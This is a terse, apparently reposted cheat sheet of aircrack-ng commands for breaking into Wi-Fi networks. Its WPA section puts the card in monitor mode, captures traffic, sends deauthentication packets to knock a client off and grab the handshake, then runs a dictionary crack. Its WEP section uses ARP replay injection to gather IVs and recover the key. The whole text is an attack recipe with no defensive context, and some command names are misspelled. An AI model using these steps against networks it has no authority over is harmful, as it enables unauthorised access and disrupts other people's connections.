wifi hand

wpa
airmon-ng start wlan0
airodump-ng -c 6 -w logs  wlan0mon
aireplay-ng -0 5 -a ap'mac -c clink'mac wlan0mon
aircreak-ng -w dic 123.cap


wep

airmon-ng start wlan0
airodump-ng wlan0mon
airodump-ng --ivs -w lons -c 6 wlan0mon
aireplay-ng -3 -b ap'mac -h client'mac wlan0mon
aircrack-ng  123.ivs

.

原文地址:https://www.cnblogs.com/outline/p/4846636.html